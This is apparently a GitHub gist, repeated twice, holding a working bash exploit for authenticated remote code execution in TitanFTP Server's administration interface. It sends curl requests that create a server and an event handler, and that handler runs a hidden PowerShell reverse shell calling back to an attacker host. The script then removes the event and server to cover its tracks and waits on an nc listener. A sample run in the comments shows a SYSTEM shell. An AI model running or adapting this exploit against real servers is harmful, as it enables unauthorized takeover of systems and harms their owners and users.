bcoles/titanftp-server-admin-event-handler-rce

## titanftp-server-admin-event-handler-rce
#!/bin/bash
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Requires remote administration interface to be enabled. (Default port 31001/tcp).
# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
# ---
# $ ./titanftp-server-admin-event-handler-rce
# TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Generating PowerShell reverse shell to 172.16.191.165:1337 ...
# No encoder or badchars specified, outputting raw payload
# Payload size: 1587 bytes
# Creating server (newtitanserver) ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Adding event (11021) ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse>testevent%7Ctestevent%7C1%7C1%7C1%7C0%7C0%7C3%7C1%7C11021%7C0%7C3006%7CC%3A%5Cwindows%5Csystem32%5Ccmd.exe%7C/c%20powershell.exe%20%2Dw%20hidden%20%2Dnop%20%2Dc%20%24a%3D%27172.16.191.165%27%3B%24b%3D1337%3B%24c%3DNew%2DObject%20system.net.sockets.tcpclient%3B%24nb%3DNew%2DObject%20System.Byte%5B%5D%20%24c.ReceiveBufferSize%3B%24ob%3DNew%2DObject%20System.Byte%5B%5D%2065536%3B%24eb%3DNew%2DObject%20System.Byte%5B%5D%2065536%3B%24e%3Dnew%2Dobject%20System.Text.UTF8Encoding%3B%24p%3DNew%2DObject%20System.Diagnostics.Process%3B%24p.StartInfo.FileName%3D%27cmd.exe%27%3B%24p.StartInfo.RedirectStandardInput%3D1%3B%24p.StartInfo.RedirectStandardOutput%3D1%3B%24p.StartInfo.RedirectStandardError%3D1%3B%24p.StartInfo.UseShellExecute%3D0%3B%24q%3D%24p.Start%28%29%3B%24is%3D%24p.StandardInput%3B%24os%3D%24p.StandardOutput%3B%24es%3D%24p.StandardError%3B%24osread%3D%24os.BaseStream.BeginRead%28%24ob%2C%200%2C%20%24ob.Length%2C%20%24null%2C%20%24null%29%3B%24esread%3D%24es.BaseStream.BeginRead%28%24eb%2C%200%2C%20%24eb.Length%2C%20%24null%2C%20%24null%29%3B%24c.connect%28%24a%2C%24b%29%3B%24s%3D%24c.GetStream%28%29%3Bwhile%20%28%24true%29%20%7B%20%20%20%20start%2Dsleep%20%2Dm%20100%3B%20%20%20%20if%20%28%24osread.IsCompleted%20%2Dand%20%24osread.Result%20%2Dne%200%29%20%7B%20%20%20%20%20%20%24r%3D%24os.BaseStream.EndRead%28%24osread%29%3B%20%20%20%20%20%20%24s.Write%28%24ob%2C0%2C%24r%29%3B%20%20%20%20%20%20%24s.Flush%28%29%3B%20%20%20%20%20%20%24osread%3D%24os.BaseStream.BeginRead%28%24ob%2C%200%2C%20%24ob.Length%2C%20%24null%2C%20%24null%29%3B%20%20%20%20%7D%20%20%20%20if%20%28%24esread.IsCompleted%20%2Dand%20%24esread.Result%20%2Dne%200%29%20%7B%20%20%20%20%20%20%24r%3D%24es.BaseStream.EndRead%28%24esread%29%3B%20%20%20%20%20%20%24s.Write%28%24eb%2C0%2C%24r%29%3B%20%20%20%20%20%20%24s.Flush%28%29%3B%20%20%20%20%20%20%24esread%3D%24es.BaseStream.BeginRead%28%24eb%2C%200%2C%20%24eb.Length%2C%20%24null%2C%20%24null%29%3B%20%20%20%20%7D%20%20%20%20if%20%28%24s.DataAvailable%29%20%7B%20%20%20%20%20%20%24r%3D%24s.Read%28%24nb%2C0%2C%24nb.Length%29%3B%20%20%20%20%20%20if%20%28%24r%20%2Dlt%201%29%20%7B%20%20%20%20%20%20%20%20%20%20break%3B%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%20%24str%3D%24e.GetString%28%24nb%2C0%2C%24r%29%3B%20%20%20%20%20%20%20%20%20%20%24is.write%28%24str%29%3B%20%20%20%20%20%20%7D%20%20%20%20%7D%20%20%20%20if%20%28%24c.Connected%20%2Dne%20%24true%20%2Dor%20%28%24c.Client.Poll%281%2C%5BSystem.Net.Sockets.SelectMode%5D%3A%3ASelectRead%29%20%2Dand%20%24c.Client.Available%20%2Deq%200%29%29%20%7B%20%20%20%20%20%20%20%20break%3B%20%20%20%20%7D%20%20%20%20if%20%28%24p.ExitCode%20%2Dne%20%24null%29%20%7B%20%20%20%20%20%20%20%20break%3B%20%20%20%20%7D%7D%7C0%7C0%7C60%7C0%7C0%7C</SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Executing event ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Removing event ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Removing server ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Listening on port 1337 ...
# Ncat: Version 7.80 ( https://nmap.org/ncat )
# Ncat: Listening on :::1337
# Ncat: Listening on 0.0.0.0:1337
# Ncat: Connection from 172.16.191.242.
# Ncat: Connection from 172.16.191.242:55477.
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
#
# C:\Windows\system32>whoami
# whoami
# nt authority\system
# ---
# ~ bcoles

# target
RHOST="http://172.16.191.242:31001/admin.dll"
CREDS="Administrator:123"
# connect back
LHOST="172.16.191.165"
LPORT=1337

echo "TitanFTP Server Administrator Event Handler Authenticated RCE"
echo

echo "Generating PowerShell reverse shell to ${LHOST}:${LPORT} ..."

if command -v msfvenom; then
  PAYLOAD=$(msfvenom --arch cmd --platform windows -p cmd/windows/reverse_powershell LHOST="${LHOST}" LPORT="${LPORT}")
else
  # ./msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.191.165 LPORT=1337 | sed 's/\$/\\\$/g'
  PAYLOAD="powershell.exe -w hidden -nop -c \$a='${LHOST}';\$b=${LPORT};\$c=New-Object system.net.sockets.tcpclient;\$nb=New-Object System.Byte[] \$c.ReceiveBufferSize;\$ob=New-Object System.Byte[] 65536;\$eb=New-Object System.Byte[] 65536;\$e=new-object System.Text.UTF8Encoding;\$p=New-Object System.Diagnostics.Process;\$p.StartInfo.FileName='cmd.exe';\$p.StartInfo.RedirectStandardInput=1;\$p.StartInfo.RedirectStandardOutput=1;\$p.StartInfo.RedirectStandardError=1;\$p.StartInfo.UseShellExecute=0;\$q=\$p.Start();\$is=\$p.StandardInput;\$os=\$p.StandardOutput;\$es=\$p.StandardError;\$osread=\$os.BaseStream.BeginRead(\$ob, 0, \$ob.Length, \$null, \$null);\$esread=\$es.BaseStream.BeginRead(\$eb, 0, \$eb.Length, \$null, \$null);\$c.connect(\$a,\$b);\$s=\$c.GetStream();while (\$true) {    start-sleep -m 100;    if (\$osread.IsCompleted -and \$osread.Result -ne 0) {      \$r=\$os.BaseStream.EndRead(\$osread);      \$s.Write(\$ob,0,\$r);      \$s.Flush();      \$osread=\$os.BaseStream.BeginRead(\$ob, 0, \$ob.Length, \$null, \$null);    }    if (\$esread.IsCompleted -and \$esread.Result -ne 0) {      \$r=\$es.BaseStream.EndRead(\$esread);      \$s.Write(\$eb,0,\$r);      \$s.Flush();      \$esread=\$es.BaseStream.BeginRead(\$eb, 0, \$eb.Length, \$null, \$null);    }    if (\$s.DataAvailable) {      \$r=\$s.Read(\$nb,0,\$nb.Length);      if (\$r -lt 1) {          break;      } else {          \$str=\$e.GetString(\$nb,0,\$r);          \$is.write(\$str);      }    }    if (\$c.Connected -ne \$true -or (\$c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and \$c.Client.Available -eq 0)) {        break;    }    if (\$p.ExitCode -ne \$null) {        break;    }}"
fi

#echo "Retrieving servers ..."
#curl -is --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
#  --data "<SRRequest><Target>DOM</Target><Action>ENUM</Action><ServerName/><Payload></Payload></SRRequest>"

SERVER_NAME="newtitanserver"
echo "Creating server (${SERVER_NAME}) ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
  --data "<SRRequest><Target>SVR</Target><Action>CREATE</Action><ServerName>${SERVER_NAME}</ServerName><Payload><fxServerParams><RunAtStartup>1</RunAtStartup><ServerName>${SERVER_NAME}</ServerName><ServerDesc>${SERVER_NAME}</ServerDesc><Host>0.0.0.0</Host></fxServerParams></Payload></SRRequest>"

#EVENT_TYPE="11070" # "Connection attempt succeeded"
#EVENT_TYPE="11071" # "Connection attempt failed"
EVENT_TYPE="11021" # "Server start failed"
echo "Adding event (${EVENT_TYPE}) ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
  --data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>A|testevent|testevent|1|1|1|0|0|3|0|${EVENT_TYPE}|0|3006|C:\\windows\\system32\\cmd.exe|/c ${PAYLOAD}|0|0|60|0|0|</Payload></SRRequest>"

EVENT_ID="1"

echo "Executing event ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
  --data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>F|${EVENT_ID}|</Payload></SRRequest>"

echo "Removing event ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
  --data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>D|${EVENT_ID}|</Payload></SRRequest>"

echo "Removing server ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
  --data "<SRRequest><Target>SVR</Target><Action>DELETE</Action><ServerName>${SERVER_NAME}</ServerName><Payload></Payload></SRRequest>"

echo "Listening on port ${LPORT} ..."
nc -lvp "${LPORT}"
	#!/bin/bash
	# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
	#
	# Requires remote administration interface to be enabled. (Default port 31001/tcp).
	# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
	# ---
	# $ ./titanftp-server-admin-event-handler-rce
	# TitanFTP Server Administrator Event Handler Authenticated RCE
	#
	# Generating PowerShell reverse shell to 172.16.191.165:1337 ...
	# No encoder or badchars specified, outputting raw payload
	# Payload size: 1587 bytes
	# Creating server (newtitanserver) ...
	# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
	# Adding event (11021) ...
	# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse>testevent%7Ctestevent%7C1%7C1%7C1%7C0%7C0%7C3%7C1%7C11021%7C0%7C3006%7CC%3A%5Cwindows%5Csystem32%5Ccmd.exe%7C/c%20powershell.exe%20%2Dw%20hidden%20%2Dnop%20%2Dc%20%24a%3D%27172.16.191.165%27%3B%24b%3D1337%3B%24c%3DNew%2DObject%20system.net.sockets.tcpclient%3B%24nb%3DNew%2DObject%20System.Byte%5B%5D%20%24c.ReceiveBufferSize%3B%24ob%3DNew%2DObject%20System.Byte%5B%5D%2065536%3B%24eb%3DNew%2DObject%20System.Byte%5B%5D%2065536%3B%24e%3Dnew%2Dobject%20System.Text.UTF8Encoding%3B%24p%3DNew%2DObject%20System.Diagnostics.Process%3B%24p.StartInfo.FileName%3D%27cmd.exe%27%3B%24p.StartInfo.RedirectStandardInput%3D1%3B%24p.StartInfo.RedirectStandardOutput%3D1%3B%24p.StartInfo.RedirectStandardError%3D1%3B%24p.StartInfo.UseShellExecute%3D0%3B%24q%3D%24p.Start%28%29%3B%24is%3D%24p.StandardInput%3B%24os%3D%24p.StandardOutput%3B%24es%3D%24p.StandardError%3B%24osread%3D%24os.BaseStream.BeginRead%28%24ob%2C%200%2C%20%24ob.Length%2C%20%24null%2C%20%24null%29%3B%24esread%3D%24es.BaseStream.BeginRead%28%24eb%2C%200%2C%20%24eb.Length%2C%20%24null%2C%20%24null%29%3B%24c.connect%28%24a%2C%24b%29%3B%24s%3D%24c.GetStream%28%29%3Bwhile%20%28%24true%29%20%7B%20%20%20%20start%2Dsleep%20%2Dm%20100%3B%20%20%20%20if%20%28%24osread.IsCompleted%20%2Dand%20%24osread.Result%20%2Dne%200%29%20%7B%20%20%20%20%20%20%24r%3D%24os.BaseStream.EndRead%28%24osread%29%3B%20%20%20%20%20%20%24s.Write%28%24ob%2C0%2C%24r%29%3B%20%20%20%20%20%20%24s.Flush%28%29%3B%20%20%20%20%20%20%24osread%3D%24os.BaseStream.BeginRead%28%24ob%2C%200%2C%20%24ob.Length%2C%20%24null%2C%20%24null%29%3B%20%20%20%20%7D%20%20%20%20if%20%28%24esread.IsCompleted%20%2Dand%20%24esread.Result%20%2Dne%200%29%20%7B%20%20%20%20%20%20%24r%3D%24es.BaseStream.EndRead%28%24esread%29%3B%20%20%20%20%20%20%24s.Write%28%24eb%2C0%2C%24r%29%3B%20%20%20%20%20%20%24s.Flush%28%29%3B%20%20%20%20%20%20%24esread%3D%24es.BaseStream.BeginRead%28%24eb%2C%200%2C%20%24eb.Length%2C%20%24null%2C%20%24null%29%3B%20%20%20%20%7D%20%20%20%20if%20%28%24s.DataAvailable%29%20%7B%20%20%20%20%20%20%24r%3D%24s.Read%28%24nb%2C0%2C%24nb.Length%29%3B%20%20%20%20%20%20if%20%28%24r%20%2Dlt%201%29%20%7B%20%20%20%20%20%20%20%20%20%20break%3B%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%20%24str%3D%24e.GetString%28%24nb%2C0%2C%24r%29%3B%20%20%20%20%20%20%20%20%20%20%24is.write%28%24str%29%3B%20%20%20%20%20%20%7D%20%20%20%20%7D%20%20%20%20if%20%28%24c.Connected%20%2Dne%20%24true%20%2Dor%20%28%24c.Client.Poll%281%2C%5BSystem.Net.Sockets.SelectMode%5D%3A%3ASelectRead%29%20%2Dand%20%24c.Client.Available%20%2Deq%200%29%29%20%7B%20%20%20%20%20%20%20%20break%3B%20%20%20%20%7D%20%20%20%20if%20%28%24p.ExitCode%20%2Dne%20%24null%29%20%7B%20%20%20%20%20%20%20%20break%3B%20%20%20%20%7D%7D%7C0%7C0%7C60%7C0%7C0%7C</SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
	# Executing event ...
	# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
	# Removing event ...
	# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
	# Removing server ...
	# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
	# Listening on port 1337 ...
	# Ncat: Version 7.80 ( https://nmap.org/ncat )
	# Ncat: Listening on :::1337
	# Ncat: Listening on 0.0.0.0:1337
	# Ncat: Connection from 172.16.191.242.
	# Ncat: Connection from 172.16.191.242:55477.
	# Microsoft Windows [Version 6.1.7601]
	# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
	#
	# C:\Windows\system32>whoami
	# whoami
	# nt authority\system
	# ---
	# ~ bcoles

	# target
	RHOST="http://172.16.191.242:31001/admin.dll"
	CREDS="Administrator:123"
	# connect back
	LHOST="172.16.191.165"
	LPORT=1337

	echo "TitanFTP Server Administrator Event Handler Authenticated RCE"
	echo

	echo "Generating PowerShell reverse shell to ${LHOST}:${LPORT} ..."

	if command -v msfvenom; then
	PAYLOAD=$(msfvenom --arch cmd --platform windows -p cmd/windows/reverse_powershell LHOST="${LHOST}" LPORT="${LPORT}")
	else
	# ./msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.191.165 LPORT=1337 \| sed 's/\$/\\\$/g'
	PAYLOAD="powershell.exe -w hidden -nop -c \$a='${LHOST}';\$b=${LPORT};\$c=New-Object system.net.sockets.tcpclient;\$nb=New-Object System.Byte[] \$c.ReceiveBufferSize;\$ob=New-Object System.Byte[] 65536;\$eb=New-Object System.Byte[] 65536;\$e=new-object System.Text.UTF8Encoding;\$p=New-Object System.Diagnostics.Process;\$p.StartInfo.FileName='cmd.exe';\$p.StartInfo.RedirectStandardInput=1;\$p.StartInfo.RedirectStandardOutput=1;\$p.StartInfo.RedirectStandardError=1;\$p.StartInfo.UseShellExecute=0;\$q=\$p.Start();\$is=\$p.StandardInput;\$os=\$p.StandardOutput;\$es=\$p.StandardError;\$osread=\$os.BaseStream.BeginRead(\$ob, 0, \$ob.Length, \$null, \$null);\$esread=\$es.BaseStream.BeginRead(\$eb, 0, \$eb.Length, \$null, \$null);\$c.connect(\$a,\$b);\$s=\$c.GetStream();while (\$true) { start-sleep -m 100; if (\$osread.IsCompleted -and \$osread.Result -ne 0) { \$r=\$os.BaseStream.EndRead(\$osread); \$s.Write(\$ob,0,\$r); \$s.Flush(); \$osread=\$os.BaseStream.BeginRead(\$ob, 0, \$ob.Length, \$null, \$null); } if (\$esread.IsCompleted -and \$esread.Result -ne 0) { \$r=\$es.BaseStream.EndRead(\$esread); \$s.Write(\$eb,0,\$r); \$s.Flush(); \$esread=\$es.BaseStream.BeginRead(\$eb, 0, \$eb.Length, \$null, \$null); } if (\$s.DataAvailable) { \$r=\$s.Read(\$nb,0,\$nb.Length); if (\$r -lt 1) { break; } else { \$str=\$e.GetString(\$nb,0,\$r); \$is.write(\$str); } } if (\$c.Connected -ne \$true -or (\$c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and \$c.Client.Available -eq 0)) { break; } if (\$p.ExitCode -ne \$null) { break; }}"
	fi

	#echo "Retrieving servers ..."
	#curl -is --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
	# --data "<SRRequest><Target>DOM</Target><Action>ENUM</Action><ServerName/><Payload></Payload></SRRequest>"

	SERVER_NAME="newtitanserver"
	echo "Creating server (${SERVER_NAME}) ..."
	curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
	--data "<SRRequest><Target>SVR</Target><Action>CREATE</Action><ServerName>${SERVER_NAME}</ServerName><Payload><fxServerParams><RunAtStartup>1</RunAtStartup><ServerName>${SERVER_NAME}</ServerName><ServerDesc>${SERVER_NAME}</ServerDesc><Host>0.0.0.0</Host></fxServerParams></Payload></SRRequest>"

	#EVENT_TYPE="11070" # "Connection attempt succeeded"
	#EVENT_TYPE="11071" # "Connection attempt failed"
	EVENT_TYPE="11021" # "Server start failed"
	echo "Adding event (${EVENT_TYPE}) ..."
	curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
	--data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>A\|testevent\|testevent\|1\|1\|1\|0\|0\|3\|0\|${EVENT_TYPE}\|0\|3006\|C:\\windows\\system32\\cmd.exe\|/c ${PAYLOAD}\|0\|0\|60\|0\|0\|</Payload></SRRequest>"

	EVENT_ID="1"

	echo "Executing event ..."
	curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
	--data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>F\|${EVENT_ID}\|</Payload></SRRequest>"

	echo "Removing event ..."
	curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
	--data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>D\|${EVENT_ID}\|</Payload></SRRequest>"

	echo "Removing server ..."
	curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
	--data "<SRRequest><Target>SVR</Target><Action>DELETE</Action><ServerName>${SERVER_NAME}</ServerName><Payload></Payload></SRRequest>"

	echo "Listening on port ${LPORT} ..."
	nc -lvp "${LPORT}"